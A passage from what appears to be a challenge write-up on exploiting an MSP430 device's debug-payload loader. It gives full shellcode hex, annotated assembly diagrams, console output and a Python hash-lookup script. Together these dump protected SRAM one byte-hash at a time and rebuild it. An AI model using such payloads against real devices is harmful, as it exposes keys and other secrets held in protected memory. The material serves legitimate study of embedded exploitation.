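        value = DIGEST_TO_BYTE.get(line.lower())
        if value is None:
            continue  # not a one-byte hash, e.g. the initial whole-SRAM hash
        recovered.append(value)
    return bytes(recovered)


# Synthetic log covering the made-up bytes 13 37 00.
sample_log = "\n".join(
    ["Internal SRAM Hash:"]
    + [hashlib.sha256(bytes([b])).hexdigest().upper() for b in b"\x13\x37\x00"]
)
print(decode_console_log(sample_log).hex())  # prints 133700
```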

Functionality Breakdown

The payload would be a while loop if implemented in a higher-level language. The first instruction is responsible for jumping over the data section.

┌──┐  ┌────────────────────┐
│PC├─►│jmp     $+0x32      ├───┐
└──┘  ├────────────────────┤   │
      │                    │   │
      │        DATA        │   │JUMP
      │                    │   │
      ├────────────────────┤   │
      │mov     #0x8002, r4 │◄──┘
      ├────────────────────┤
      │mov     @r4, &0x44ee│        
      ├────────────────────┤
      │incd    r4          │
      ├────────────────────┤
      │mov     @r4, &0x44f0│
      ├────────────────────┤
      │mov     sp, r13     │
      ├────────────────────┤
      │mov     #0x1, r14   │
      ├────────────────────┤
      │mov     &0x8006, r15│
      ├────────────────────┤
      │inc     r15         │
      ├────────────────────┤
      │mov     r15, &0x8006│
      ├────────────────────┤
      │mov     &0x8008, r6 │
      ├────────────────────┤
      │cmp     r6, r15     │
      ├────────────────────┤
      │jz      $+0x6       │
      ├────────────────────┤
      │br      #0x44a6     │
      └────────────────────┘
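
The counter logic in the diagram above can be restated in a higher-level form. The Python sketch below models only the offset bookkeeping, treating the words at 0x8006 and 0x8008 as the counter and the limit. The initial values of those words are not shown here, so the ones in the example are made up, and `hashed_offsets` is a hypothetical name.

```python
def hashed_offsets(counter: int, limit: int):
    """Yield each R15 value the loop would pass to sha256_internal.

    counter models the word at 0x8006 and limit the word at 0x8008.
    """
    while True:
        counter = (counter + 1) & 0xFFFF  # inc r15, then mov r15, &0x8006
        if counter == limit:              # cmp r6, r15 then jz $+0x6
            return                        # falls through past the branch
        yield counter                     # br #0x44a6 with R14 = 1


# Made-up values: a counter of 0xFFFF wraps so the first offset hashed is 0.
print([hex(offset) for offset in hashed_offsets(counter=0xFFFF, limit=0x0004)])
```

Because the increment happens before the comparison, the first offset hashed is one past the stored counter value.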

After the initial jump come two writes that patch a branch instruction in just after the end of the loop that prints the SRAM hash. When executed later, this patched opcode causes execution to jump back to the start of the payload.

       ┌────────────────────┐
       │jmp     $+0x32      │
       ├────────────────────┤
       │                    │
       │        DATA        │
       │                    │
       ├────────────────────┤
       │mov     #0x8002, r4 │
┌───┐  ├────────────────────┤PATCH¹
│PC¹├─►│mov     @r4, &0x44ee├──────┐
└───┘  ├────────────────────┤      │
       │incd    r4          │      │
┌───┐  ├────────────────────┤PATCH²│
│PC²├─►│mov     @r4, &0x44f0├──────┤
└───┘  ├────────────────────┤      │WRITES
       │mov     sp, r13     │      │OPCODE
       ├────────────────────┤      ▼
       │mov     #0x1, r14   │ ┌──────────┐
       ├────────────────────┤ │br #0x8000│
       │mov     &0x8006, r15│ └────┬─────┘
       ├────────────────────┤      │TO
       │inc     r15         │      │
       ├────────────────────┤      │
       │mov     r15, &0x8006│      │
       ├────────────────────┤      │
       │mov     &0x8008, r6 │      │
       ├────────────────────┤      │
       │cmp     r6, r15     │      │
       ├────────────────────┤      │
       │jz      $+0x6       │      │
       ├────────────────────┤      │
       │br      #0x44a6     │      │
       └────────────────────┘      │
                                   │
     ┌─────────────────────────────┘
     │
     │ ┌──────────────────────────────────────────────────┐
     │ │and	#0xf, r14                                 │
     │ ├──────────────────────────────────────────────────┤
     │ │mov.b	0x4710(r14), r15                          │
     │ ├──────────────────────────────────────────────────┤
     │ │call    #0x4578 <putchar>                         │
     │ ├──────────────────────────────────────────────────┤
     │ │mov.b   r10, r15                                  │
     │ ├──────────────────────────────────────────────────┤
     │ │call    #0x4578 <putchar>                         │
     │ ├──────────────────────────────────────────────────┤
     │ │inc     r11                                       │
     │ ├──────────────────────────────────────────────────┤
     │ │cmp     #0x20, r11                                │
     │ ├──────────────────────────────────────────────────┤
     │ │jnz     $-0x38 <main+0x6e>                        │
     │ ├──────────────────────────────────────────────────┤
     │ │mov     #0x4721, r15                              │
     │ ├──────────────────────────────────────────────────┤
     │ │call    #0x4586 <puts>                            │
     │ ├──────────────────────────────────────────────────┤
     └►│mov     #0x4722 "Please enter debug payload.", r15│
       ├──────────────────────────────────────────────────┤
       │call    #0x4586 <puts>                            │
       ├──────────────────────────────────────────────────┤
       │mov     #0x400, r13                               │
       ├──────────────────────────────────────────────────┤
       │clr     r14                                       │
       ├──────────────────────────────────────────────────┤
       │mov     #0x2400, r15                              │
       ├──────────────────────────────────────────────────┤
       │call    #0x45c8 <memset>                          │
       └──────────────────────────────────────────────────┘

The parameters for the call to sha256_internal come next.

      ┌────────────────────┐
      │mov     #0x8002, r4 │
      ├────────────────────┤
      │mov     @r4, &0x44ee│
      ├────────────────────┤
      │incd    r4          │
      ├────────────────────┤
      │mov     @r4, &0x44f0│
      ├────────────────────┤
      │mov     sp, r13     │
┌──┐  ├────────────────────┤
│PC├─►│mov     #0x1, r14   │
└──┘  ├────────────────────┤
      │mov     &0x8006, r15│
      ├────────────────────┤
      │inc     r15         │
      ├────────────────────┤
      │mov     r15, &0x8006│
      ├────────────────────┤
      │mov     &0x8008, r6 │
      ├────────────────────┤
      │cmp     r6, r15     │
      ├────────────────────┤
      │jz      $+0x6       │
      ├────────────────────┤
      │br      #0x44a6     │
      └────────────────────┘

The value at 0x8006 is a counter in the data section containing the offset for the byte in SRAM to hash for the current iteration.

       ┌────────────────────┐      ┌──────┐
       │mov     #0x8002, r4 │      │      │
       ├────────────────────┤      │ DATA │
       │mov     @r4, &0x44ee│      │      │
       ├────────────────────┤      ├──────┤
       │incd    r4          │      │ 3040 │
       ├────────────────────┤      ├──────┤      ┌────┐           ┌────┐
       │mov     @r4, &0x44f0│      │ 0080 │      │R15:│           │R15:│
       ├────────────────────┤      ├──────┤ LOAD¹├────┤ INCREMENT²├────┤
       │mov     sp, r13     │    ┌►│ FFFF ├─────►│FFFF├──────────►│0000│
       ├────────────────────┤    │ ├──────┤      └────┘           └─┬──┘
       │mov     #0x1, r14   │    │ │ 0010 │                         │
┌───┐  ├────────────────────┤    │ ├──────┤                         │
│PC¹├─►│mov     &0x8006, r15│    │ │ .... │                         │
├───┤  ├────────────────────┤    │ ├──────┤                         │
│PC²├─►│inc     r15         │    │ │ .... │                         │
├───┤  ├────────────────────┤    │ └──────┘                         │
│PC³├─►│mov     r15, &0x8006│    │               STORE³             │
└───┘  ├────────────────────┤    └──────────────────────────────────┘
       │mov     &0x8008, r6 │
       ├────────────────────┤
       │cmp     r6, r15     │
       ├────────────────────┤
       │jz      $+0x6       │
       ├────────────────────┤
       │br      #0x44a6     │
       └────────────────────┘

The first iteration of this loop increments the counter variable from 0xFFFF, causing a deliberate 16-bit integer overflow that wraps the offset around to 0x0000. The next instruction updates the word at address 0x8006 with the new value.

This counter will be 0x0001 on the next iteration, then 0x0002, and so on.

i = 1

  ┌──────┐
  │      │
  │ DATA │
  │      │
  ├──────┤
  │ 3040 │
  ├──────┤      ┌────┐           ┌────┐
  │ 0080 │      │R15:│           │R15:│
  ├──────┤ LOAD¹├────┤ INCREMENT²├────┤
┌►│ 0000 ├─────►│0000├──────────►│0001│
│ ├──────┤      └────┘           └─┬──┘
│ │ 0010 │                         │
│ ├──────┤                         │
│ │ .... │                         │
│ ├──────┤                         │
│ │ .... │                         │
│ └──────┘                         │
│               STORE³             │
└──────────────────────────────────┘

i = 2

  ┌──────┐
  │      │
  │ DATA │
  │      │
  ├──────┤
  │ 3040 │
  ├──────┤      ┌────┐           ┌────┐
  │ 0080 │      │R15:│           │R15:│
  ├──────┤ LOAD¹├────┤ INCREMENT²├────┤
┌►│ 0001 ├─────►│0001├──────────►│0002│
│ ├──────┤      └────┘           └─┬──┘
│ │ 0010 │                         │
│ ├──────┤                         │
│ │ .... │                         │
│ ├──────┤                         │
│ │ .... │                         │
│ └──────┘                         │
│               STORE³             │
└──────────────────────────────────┘

The last item of importance is the termination condition. Without one, the loop would run past the end of SRAM and cause the processor to halt with the "Exceeded SRAM length" error. While this is not problematic for this version, it will be necessary to avoid this when extending the payload with more code later.

The SRAM is 4096 bytes long. One of the words in the data section stores this value, and the payload code compares it to the current offset after every iteration. If the current offset is 0x1000, the code deliberately jumps into null memory and crashes the MCU.

       ┌────────────────────┐        ┌──────┐
       │mov     #0x8002, r4 │        │      │
       ├────────────────────┤        │ DATA │
       │mov     @r4, &0x44ee│        │      │
       ├────────────────────┤        ├──────┤
       │incd    r4          │        │ 3040 │
       ├────────────────────┤        ├──────┤
       │mov     @r4, &0x44f0│        │ 0080 │
       ├────────────────────┤        ├──────┤      ┌────┐
       │mov     sp, r13     │        │ FFFF │      │R6: │
       ├────────────────────┤        ├──────┤ LOAD¹├────┤
       │mov     #0x1, r14   │        │ 0010 ├─────►│1000│
       ├────────────────────┤        ├──────┤      └─┬──┘
       │mov     &0x8006, r15│        │ .... │        │
       ├────────────────────┤        ├──────┤        │
       │inc     r15         │        │ .... │        │
       ├────────────────────┤        └──────┘        │
       │mov     r15, &0x8006│                        │
┌───┐  ├────────────────────┤        ┌─────────────┐ │
│PC¹├─►│mov     &0x8008, r6 │        │   COMPARE²  │ │
├───┤  ├────────────────────┤        ├─────────────┤ │
│PC²├─►│cmp     r6, r15     │        │             │ │
├───┤  ├────────────────────┤        │ ┌───┐ ┌───┐ │ │
│PC³├─►│jz      $+0x6       ├──────┐ │ │R6 │ │R15│ │◄┘
└───┘  ├────────────────────┤      │ │ └───┘ └───┘ │
       │br      #0x44a6     │      │ │             │
       └────────────────────┘      │ └─────────────┘
                                   │
       ┌───────────┐               │
       │NULL MEMORY│◄──────────────┘
       └─────┬─────┘  JUMP IF EQUAL³
             │
             ▼
       ┌───────────┐
       │---CRASH---│
       └───────────┘

If the current offset is not 0x1000, execution branches into the middle of the main function just before the loop that prints the internal SRAM hash character by character. After it prints the hash for the current byte, execution will reach the branch instruction patched in earlier. This instruction will cause execution to branch back to the start of the shellcode, thus completing one iteration of the loop. Every iteration will print the hash of one byte in SRAM to the I/O console.

      ┌────────────────────┐
      │jmp     $+0x32      │◄────────────────────────────┐
      ├────────────────────┤                             │
      │                    │                             │
      │        DATA        │                             │
      │                    │                             │
      ├────────────────────┤                             │
      │mov     #0x8002, r4 │                             │
      ├────────────────────┤                             │
      │mov     @r4, &0x44ee│                             │
      ├────────────────────┤                             │
      │incd    r4          │                             │
      ├────────────────────┤                             │
      │mov     @r4, &0x44f0│                             │
      ├────────────────────┤                             │
      │mov     sp, r13     │                             │
      ├────────────────────┤                             │
      │mov     #0x1, r14   │                             │
      ├────────────────────┤                             │
      │mov     &0x8006, r15│                             │
      ├────────────────────┤                             │
      │inc     r15         │                             │
      ├────────────────────┤                             │
      │mov     r15, &0x8006│                             │
      ├────────────────────┤                             │
      │mov     &0x8008, r6 │                             │
      ├────────────────────┤                             │
      │cmp     r6, r15     │                             │
      ├────────────────────┤                             │
      │jz      $+0x6       │                             │
┌──┐  ├────────────────────┤                             │
│PC├─►│br      #0x44a6     │                             │
└──┘  └────────┬───────────┘                             │
               │                                         │
               │ BRANCH¹                                 │
               ▼                                         │
      ┌────┬─────────────────────────────────┐           │
      │44a6│call    #0x45b6 <sha256_internal>│           │
      ├────┼─────────────────────────────────┤           │
      │44aa│clr     r11                      │           │
      ├────┼─────────────────────────────────┤           │
      │44ac│mov     sp, r15                  │◄────────┐ │
      ├────┼─────────────────────────────────┤         │ │
      │44ae│add     11, r15                  │         │ │
      ├────┼─────────────────────────────────┤         │ │
      │....│....                             │         │ │
      ├────┼─────────────────────────────────┤         │ │
      │44d4│call    #0x4578 <putchar>        │         │ │
      ├────┼─────────────────────────────────┤         │ │
      │44d8│mov.b   r10, r15                 │         │ │
      ├────┼─────────────────────────────────┤         │ │
      │44da│call    #0x4578 <putchar>        │         │ │
      ├────┼─────────────────────────────────┤         │ │
      │44de│inc     r11                      │         │ │
      ├────┼─────────────────────────────────┤         │ │
      │44e0│cmp     #0x20, r11               │ PUTCHAR │ │
      ├────┼─────────────────────────────────┤ LOOP²   │ │
      │44e4│jnz     $-0x38 <main+0x6e>       ├─────────┘ │
      ├────┼─────────────────────────────────┤           │
      │44e6│mov     #0x4721, r15             │           │
      ├────┼─────────────────────────────────┤           │
      │44ea│call    #0x4586 <puts>           │           │
      ├────┼─────────────────────────────────┤  BRANCH³  │
      │44ee│br      #0x8000                  ├───────────┘
      └────┴─────────────────────────────────┘
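The control flow in the diagrams above can be modelled in a higher-level language. The following is a minimal Python sketch of the loop, not the payload itself: the counter starts at 0xFFFF, wraps to 0x0000 on the first increment, and the loop stops when the offset reaches 0x1000. The function name and the example SRAM contents are hypothetical, and hashlib stands in for the call to sha256_internal.

```python
import hashlib

SRAM_SIZE = 0x1000      # limit word stored at 0x8008 in the data section
COUNTER_INIT = 0xFFFF   # counter word stored at 0x8006 in the data section


def dump_hashes(sram: bytes) -> list[str]:
    """Model the payload loop: one SHA-256 digest per byte of SRAM."""
    counter = COUNTER_INIT
    hashes = []
    while True:
        counter = (counter + 1) & 0xFFFF   # inc r15, with 16-bit wraparound
        if counter == SRAM_SIZE:           # cmp r6, r15 followed by jz
            break                          # the real payload crashes here
        # br #0x44a6: hash a single byte (r14 = 1) at offset r15
        one_byte = sram[counter:counter + 1]
        hashes.append(hashlib.sha256(one_byte).hexdigest().upper())
    return hashes


# Hypothetical SRAM contents, used only to exercise the model.
example_sram = bytes([0x22, 0x8B]) + bytes(SRAM_SIZE - 2)
example_hashes = dump_hashes(example_sram)
print(len(example_hashes), "hashes produced")
```

The mask on the increment is what reproduces the wraparound from 0xFFFF to 0x0000; Python integers do not overflow on their own.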

Payload Format

Payload Structure
Load Address	Size (Bytes)	Jump over data section	Data section (48 bytes)	Executable code
`8000`	`ff`	`183c`	`30400080ffff...`	`34400280a244...`

The size field is 255 (0xFF) for convenience, which causes the implementation to copy the null memory after the payload to the load address along with it. This quirk does not affect the payload code, so it is acceptable.

Data Section

The data section is defined as follows. Note that integers are stored little-endian.

3040 0080 ffff 0010
0000 0000 0000 0000
0000 0000 0000 0000
0000 0000 0000 0000
0000 0000 0000 0000
0000 0000 0000 0000
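As a quick check of the byte order, the first four words of the data section can be decoded with Python's struct module. This is only an illustrative sketch; the labels in the comments restate how the payload code uses each word.

```python
import struct

# First eight bytes of the data section, exactly as they appear in memory.
data_section = bytes.fromhex("3040 0080 ffff 0010")

# "<4H" means four unsigned 16-bit words, little-endian.
branch_opcode, branch_target, counter, limit = struct.unpack("<4H", data_section)

print(f"0x8002: {branch_opcode:#06x}  first word of the patched br instruction")
print(f"0x8004: {branch_target:#06x}  branch target (start of the payload)")
print(f"0x8006: {counter:#06x}  SRAM offset counter, before the first increment")
print(f"0x8008: {limit:#06x}  SRAM length used as the termination value")
```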

Full Payload

Executable instructions are highlighted below.

8000 ff 

183c
3040 0080 ffff 0010
0000 0000 0000 0000
0000 0000 0000 0000
0000 0000 0000 0000
0000 0000 0000 0000
0000 0000 0000 0000

3440 0280 a244 ee44 2453 a244 f044 

0d41
3e40 0100 
1f42 0680 
1f53
824f 0680
1642 0880
0f96
0224
3040 a644
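The two relative jumps in the payload can be checked against its layout. The sketch below decodes the MSP430 jump format (a 3-bit condition and a signed 10-bit word offset, with the target at the jump's address plus 2 plus twice the offset) and rebuilds the payload string from its parts. The helper name decode_jump and the variable names are illustrative, and the final string simply concatenates the load address, size, and body in the order shown above.

```python
def decode_jump(word: int) -> tuple[int, int]:
    """Return (condition code, byte distance from the jump's own address)."""
    if word >> 13 != 0b001:
        raise ValueError("not a jump-format instruction")
    condition = (word >> 10) & 0b111
    offset = word & 0x3FF
    if offset & 0x200:          # sign-extend the 10-bit word offset
        offset -= 0x400
    return condition, 2 + 2 * offset


LOAD_ADDRESS = 0x8000
JMP = bytes.fromhex("183c")
DATA = bytes.fromhex("3040 0080 ffff 0010" + " 0000" * 20)
CODE = bytes.fromhex(
    "3440 0280 a244 ee44 2453 a244 f044 0d41 3e40 0100 1f42 0680 "
    "1f53 824f 0680 1642 0880 0f96 0224 3040 a644"
)
body = JMP + DATA + CODE

# The leading jmp should land on the first instruction after the data section.
_, jmp_delta = decode_jump(int.from_bytes(JMP, "little"))

# The jz is the 2-byte instruction immediately before the final 4-byte br.
jz_position = len(body) - 6
jz_word = int.from_bytes(body[jz_position:jz_position + 2], "little")
_, jz_delta = decode_jump(jz_word)

print(f"data section: {len(DATA)} bytes, code: {len(CODE)} bytes")
print(f"jmp lands at {LOAD_ADDRESS + jmp_delta:#06x}")
print(f"jz lands at  {LOAD_ADDRESS + jz_position + jz_delta:#06x}")

payload_text = f"{LOAD_ADDRESS:04x}ff{body.hex()}"
print(payload_text)
```

The jz target falls on the first byte after the payload body, which is the zero-filled memory the termination condition relies on.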

Results

This payload results in the following output at the I/O console.

Executing debug payload
8A331FDDE7032F33A71E1B2E257D80166E348E00FCB17914F48BDB57A1C63007
3EBE1B59762A1C8020C1EFE3747DD07F0E30617ED60B4E6A5BEE16B6EA421DD0
3973E022E93220F9212C18D0D0C543AE7C309E46640DA93A4A0314DE999F5112
A25513C7E0F6EAA80A3337EE18081B9E2ED09E00AF8531C8F7BB2542764027E7
26E5BFE4B0686167E3E4E0AAC40CBAE03515171D375F91EA563C9C044E9C5CC7
BA5EC51D07A4AC0E951608704431D59A02B21A4E951ACC10505A8DC407C501EE
9E8E8C37A53BAC77A653D590B783B2508E8ED2FED040A278BF4F4703BBD5D82D
27952171C7FCDF0DDC765AB4F4E1C537CB29E5E533D57B3456257EE785C81711
FFE679BB831C95B67DC17819C63C5090D221AAC6F4C7BF530F594AB43D21FA1E
04B8D34E20E604CADB04B9DB8F6778C35F45A2D2A3335EA517DAFE8C9CD9B06E
9BE3799F24592E94E1F7991E5F312648A509CE2FB1EDBAFA50A66B65C916539A
DC0E9C3658A1A3ED1EC94274D8B19925C93E1ABB7DDBA294923AD9BDE30F8CB8
2795044CE0F83F718BC79C5F2ADD1E52521978DF91CE9B7F82C9097191D33602
AA687B58B0E73E2E383F8C500D75B591E188EFE0168B3FFBCD3771CAAA6DD4C7
478508483CBB05DEFD7DCDAC355DADF06282A6F2E14342CCCBA99E840202F943
BA5EC51D07A4AC0E951608704431D59A02B21A4E951ACC10505A8DC407C501EE
AA7225E7D5B0A2552BBB58880B3EC00C286995B801A7AEB69281E76A8B4908DE
E632B7095B0BF32C260FA4C539E9FD7B852D0DE454E9BE26F24D0D6F91D069D3
DE2E331D891AE267A7009CB45B4E8830F170E0C937288EA2731A1941C7A53B0D
FDE502858306C235A3121E42326B53228B7EF4690EEED92A2B2EAFE73C03A3EF
C00E7F889CFC9216EC818BF2E1682FC6AF0D89939C91776669478CAF27C9727C
74CD9EF9C7E15F57BDAD73C511462CA65CB674C46C49639C60F1B44650FA1DCB
62B67E1F685B7FEF51102005DDDD27774BE3FEE38C42965C53AAB035D0B6B221
E77B9A9AE9E30B0DBDB6F510A264EF9DE781501D7B6B92AE89EB059C5AB743DB
98722E2EBED8ED3D3652E11E4181F0DCCC1CE7D192D8F1DB370AF8EC4A4E174A
74E1ADE320C66075468E17CFAB33F41E8E0EACA45EDB6DD7B086C49A358D2A69
A9F51566BD6705F7EA6AD54BB9DEB449F795582D6529A0E22207B8981233EC58
74E1ADE320C66075468E17CFAB33F41E8E0EACA45EDB6DD7B086C49A358D2A69
4FB733BEDB74FEC8D65BEDF056B935189A289E928B3302BEC38A281814DE523A
8CE86A6AE65D3692E7305E2C58AC62EEBD97D3D943E093F577DA25C36988246B
26E5BFE4B0686167E3E4E0AAC40CBAE03515171D375F91EA563C9C044E9C5CC7
8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
2795044CE0F83F718BC79C5F2ADD1E52521978DF91CE9B7F82C9097191D33602
BA5EC51D07A4AC0E951608704431D59A02B21A4E951ACC10505A8DC407C501EE
18F5384D58BCB1BBA0BCD9E6A6781D1A6AC2CC280C330ECBAB6CB7931B721552
9D277175737FB50041E75F641ACF94D10DF9B9721DB8FFFE874AB57F8FFB062E
2E7D2C03A9507AE265ECF5B5356885A53393A2029D241394997265A1A25AEFC6
2795044CE0F83F718BC79C5F2ADD1E52521978DF91CE9B7F82C9097191D33602
19152DDFBA193B5B09FCB80D1BBA5248F36027C06E81670DB5A7146FB654D4EC
8D36BBB3D6FBF24F38BA020D9CEEEF5D4562F5F26629F66B076FF395C438695E
7ACE431CB61584CB9B8DC7EC08CF38AC0A2D649660BE86D349FB43108B542FA4
62B67E1F685B7FEF51102005DDDD27774BE3FEE38C42965C53AAB035D0B6B221
18AC3E7343F016890C510E93F935261169D9E3F565436429830FAF0934F4F8E4
74CD9EF9C7E15F57BDAD73C511462CA65CB674C46C49639C60F1B44650FA1DCB
A1FCE4363854FF888CFF4B8E7875D600C2682390412A8CF79B37D0B11148B0FA
2D3193691934124461809FB9BC7E671215099FC7D961BFBE31943D40D477C890
68AA2E2EE5DFF96E3355E6C7EE373E3D6A4E17F75F9518D843709C0C9BC3E3D4
F4F97C88C409DCF3789B5B518DA3F7D266C488066E97A606E38A150779880735
27ABDEDDFE8503496ADEB623466CAA47DA5F63ABD2BC6FA19F6CFCB73ECFED70
18AC3E7343F016890C510E93F935261169D9E3F565436429830FAF0934F4F8E4
D03502C43D74A30B936740A9517DC4EA2B2AD7168CAA0A774CEFE793CE0B33E7
189F40034BE7A199F1FA9891668EE3AB6049F82D38C68BE70F596EAB2E1857B7
FDE502858306C235A3121E42326B53228B7EF4690EEED92A2B2EAFE73C03A3EF
E52D9C508C502347344D8C07AD91CBD6068AFC75FF6292F062A09CA381C89E71
2C624232CDD221771294DFBB310ACA000A0DF6AC8B66B696D90EF06FDEFB64A3
D10B36AA74A59BCF4A88185837F658AFAF3646EFF2BB16C3928D0E9335E945D2
9DEFB0A9E163278BE0E05AA01B312EC78CFA3726869503385E76E3A4B7950648
E52D9C508C502347344D8C07AD91CBD6068AFC75FF6292F062A09CA381C89E71
8A8950F7623663222542C9469C73BE3C4C81BBDF019E2C577590A61F2CE9A157
966C7C47125C74575A9A1153B799FAF55BE33A04E3D9F98760A3EEAC377103DF
087D80F7F182DD44F184AA86CA34488853EBCC04F0C60D5294919A466B463831
5D5C7D20A3AAB9C158F23304DF4BEC3BD9D56C517DB3CAEAA519D4D05624D7A0
4D4D75D742863AB9656F3D5F76DFF8589C3922E95A24EA6812157FFE4AAA3B6B
CFAE0D4248F7142F7B17F826CD7A519280E312577690E957830D23DCF35A3FFF
6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D
6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D
6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D
6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D
6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D
6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D
6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D
6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D
6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D
6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D
6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D
6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D
[...]

There are 4096 hashes, but every single one after a certain point is the known hash for the null byte—indicating SRAM contains little data. The above output omits most of the null checksums for brevity.
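The null-byte checksum is easy to confirm independently. The following sketch computes it with hashlib and counts how many leading entries of a list of hashes precede the trailing run of null checksums; the function name and the three-entry sample list are illustrative.

```python
import hashlib

# SHA-256 of a single 0x00 byte, formatted like the console output.
NULL_HASH = hashlib.sha256(b"\x00").hexdigest().upper()
print(NULL_HASH)


def populated_hash_count(hashes: list[str]) -> int:
    """Count the entries that come before the trailing run of null hashes."""
    count = len(hashes)
    while count > 0 and hashes[count - 1] == NULL_HASH:
        count -= 1
    return count


# Tiny sample: the first hash from the output above, then two null hashes.
sample = [
    "8A331FDDE7032F33A71E1B2E257D80166E348E00FCB17914F48BDB57A1C63007",
    NULL_HASH,
    NULL_HASH,
]
print(populated_hash_count(sample))
```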

Extracting Data

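Deriving the original SRAM contents from the hashes is possible by building a small precomputed lookup table (a rainbow table in the loose sense) that maps the hash of each of the 256 possible byte values back to that byte. This can be implemented in Python as follows.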

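import binascii
import hashlib

# Map the uppercase SHA-256 hex digest of every possible byte value to that byte.
table = {}
for i in range(256):
    byte = i.to_bytes(1, "big")
    table[hashlib.sha256(byte).hexdigest().upper()] = byte

# Decode the console output one line at a time, skipping blank lines.
output = b''
with open('hashes.txt', 'r') as f:
    for line in f:
        line = line.strip()
        if line:
            output += table[line]

# Save the recovered SRAM contents as raw binary data.
with open("output.bin", "wb") as f:
    f.write(output)

print(binascii.hexlify(output).decode())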

Pasting the above 4096 hashes into a text file called "hashes.txt" and running the above Python script on it will produce a file called "output.bin" containing the contents of SRAM as raw binary data. Taking a hexdump of this file produces the following output.

hexdump -C output.bin 
00000000  22 8b 2d 55 bc 29 a9 b4  1f fb b2 0f dd fe be 29  |".-U.).........)|
00000010  fa 54 e9 f0 85 5e 3e 05  fc a8 45 a8 c9 4e bc 3f  |.T...^>...E..N.?|
00000020  dd 29 59 9d 63 dd d9 9b  7e 3e 64 5e 79 8a 19 b0  |.)Y.c...~>d^y...|
00000030  f5 64 2c 6a f0 04 38 7d  8c 04 a1 f2 ab da ef 5d  |.d,j..8}.......]|
00000040  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00001000

Differential Analysis

The secure memory content changing between runs is apparent from the differing SRAM hashes. The next objective is to determine what is changing. The following snippets are hexdumps of the output from five different runs.

Run 1:

00000000  22 8b 2d 55 bc 29 a9 b4  1f fb b2 0f dd fe be 29  |".-U.).........)|
00000010  fa 54 e9 f0 85 5e 3e 05  fc a8 45 a8 c9 4e bc 3f  |.T...^>...E..N.?|
00000020  dd 29 59 9d 63 dd d9 9b  7e 3e 64 5e 79 8a 19 b0  |.)Y.c...~>d^y...|
00000030  f5 64 2c 6a f0 04 38 7d  8c 04 a1 f2 ab da ef 5d  |.d,j..8}.......]|
00000040  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00001000

Run 2:

00000000  5c a8 2a 56 21 32 95 f9  e9 e4 38 7b 0f ea fe be  |\.*V!2....8{....|
00000010  5e 01 26 93 41 11 e4 c2  9f cd b8 e8 63 d5 bb 7b  |^.&.A.......c..{|
00000020  fe ad 51 90 0a f5 e2 68  53 57 53 40 bf 5f ec 0f  |..Q....hSWS@._..|
00000030  94 18 c8 b3 bd 57 96 23  18 0f 60 45 57 51 e0 3c  |.....W.#..`EWQ.<|
00000040  40 65 9e d7 78 2e da c4  e1 11 28 62 a9 d5 c0 10  |@e..x.....(b....|
00000050  5e 68 2e fa 0a 87 40 be  92 87 cf ba d8 09 d6 07  |^h....@.........|
00000060  19 d0 fe 93 c2 23 b4 72  06 5b 22 8d 05 2a 9e bc  |.....#.r.["..*..|
00000070  dd 39 d9 e1 c6 2e 3e 4f  39 c7 b2 e7 a6 aa 29 7e  |.9....>O9.....)~|
00000080  bf 34 79 30 03 8f db 14  ac f3 fb e1 75 7d 77 71  |.4y0........u}wq|
00000090  02 15 1d 34 68 34 5e b2  73 53 67 c1 84 d8 b6 0b  |...4h4^.sSg.....|
000000a0  85 e8 7d 94 ed fb af eb  2b 2e 22 69 36 e3 13 ac  |..}.....+."i6...|
000000b0  6b 99 5d 7d 1d 1b ea d3  81 e3 8e 8e bc af 66 33  |k.]}..........f3|
000000c0  a2 36 6b f5 71 94 fa c6  c4 18 eb b9 82 02 08 7b  |.6k.q..........{|
000000d0  b8 70 65 12 62 a1 2d 5c  d5 89 ad 78 aa 81 17 bb  |.pe.b.-\...x....|
000000e0  c7 4c b0 f1 21 d4 43 56  27 d0 bb d6 94 eb 6f 59  |.L..!.CV'.....oY|
000000f0  56 96 63 78 a8 92 d8 16  b6 c9 32 80 a1 d8 22 ab  |V.cx......2...".|
00000100  2b b8 62 86 40 72 7f 12  31 cf f2 c4 bb 5c 56 37  |+.b.@r..1....\V7|
00000110  6e 04 ef 90 69 c4 60 5f  61 b9 af 3a 7d 8e ad 53  |n...i.`_a..:}..S|
00000120  01 b3 6a 94 f6 c0 e8 aa  77 e5 f5 49 51 55 4c 33  |..j.....w..IQUL3|
00000130  5a 09 78 d4 23 2e ae 12  bb 3d 9d 5b 71 b6 d1 cb  |Z.x.#....=.[q...|
00000140  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00001000

Run 3:

00000000  10 b7 d0 4b d8 66 a7 5b  a4 d9 8f 80 22 c8 35 bb  |...K.f.[....".5.|
00000010  72 2c 8a 65 fc 9a 28 e6  04 12 d7 57 e5 a1 b8 1b  |r,.e..(....W....|
00000020  7c 96 7f 0e 0e 4e b9 de  c5 2f b2 10 f0 c3 f0 37  ||....N.../.....7|
00000030  9b a0 41 34 6b 01 93 c7  99 95 76 fd 80 63 5a 45  |..A4k.....v..cZE|
00000040  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00001000

Run 4:

00000000  39 b4 2d 38 15 1a 1c 09  6e 0c ad aa aa 96 72 db  |9.-8....n.....r.|
00000010  96 8d 7f 99 16 c7 93 76  d3 e0 48 3a 33 bd 37 76  |.......v..H:3.7v|
00000020  2e 91 dd 2d cb e2 90 ec  04 a7 26 a3 31 fe b7 37  |...-......&.1..7|
